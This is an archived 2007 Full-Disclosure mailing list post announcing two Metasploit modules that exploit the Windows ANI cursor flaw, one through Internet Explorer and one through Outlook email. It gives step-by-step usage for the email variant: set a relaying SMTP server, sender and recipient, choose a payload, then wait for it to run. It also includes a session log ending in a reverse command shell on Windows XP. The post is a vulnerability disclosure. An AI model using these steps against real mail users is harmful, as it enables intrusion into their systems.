| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 2 Apr 2007 02:03:04 -0500 From: H D Moore <fdlist@...italoffense.net> To: full-disclosure@...ts.grok.org.uk Subject: Metasploit vs ANI Two new exploit modules are available for version 3.0 of the Metasploit Framework. These modules can be obtained by using the 'Online Update' feature in Windows and the 'svn update' command on Unix-like systems. Matt Miller posted to the Metasploit Blog about our ANI efforts: http://blog.metasploit.com/ The two exploits can be viewed in the svn repository at metasploit.com: http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb The first module exploits the ANI flaw through Internet Explorer. It uses multiple icon files referenced from a single HTML page. This allows client-side brute forcing without resorting to javascript. This module will execute code on Windows 2000, Windows XP, and Windows Vista using the default target. As mentioned in the blog, a command shell is not directly accessible on Vista, but the Meterpreter payload can be used to bust out of the low-privileged process :-) The second module exploits the ANI flaw through Outlook and Outlook Express. It sends a multipart MIME e-mail that contains multiple icons files referenced from a HTML message. This allows brute forcing of the correct target via the mail reader, all without any form of client-side scripting. To use this module, point RHOST and RPORT at a SMTP server that will relay your email. Set the MAILFROM and MAILTO options, select a payload, launch the exploit, and wait for your payload to execute. An example session from the e-mail based exploit module: msf exploit(ani_loadimage_chunksize) > exploit [*] Started reverse handler [*] Connecting to SMTP server localhost:20025... [*] SMTP: 220 slug.metasploit.com ESMTP [*] SMTP: 250-slug.metasploit.com 250-PIPELINING 250-8BITMIME 250-AUTH LOGIN PLAIN CRAM-MD5 250 SIZE 0 [*] SMTP: 250 ok [*] SMTP: 250 ok [*] Sending the message (404759 bytes)... [*] SMTP: 354 go ahead [*] SMTP: 250 ok 1175497222 qp 12648 [*] Closing the connection... [*] SMTP: 221 slug.metasploit.com [*] Waiting for a payload session (backgrounding)... [*] Exploit running as background job. msf exploit(ani_loadimage_chunksize) > [*] Command shell session 1 opened (192.168.0.127:4444 -> 192.168.0.127:37299) msf exploit(ani_loadimage_chunksize) > sessions -i 1 [*] Starting interaction with 1... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\program files\Outlook Express> Enjoy! - The Metasploit Staff _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists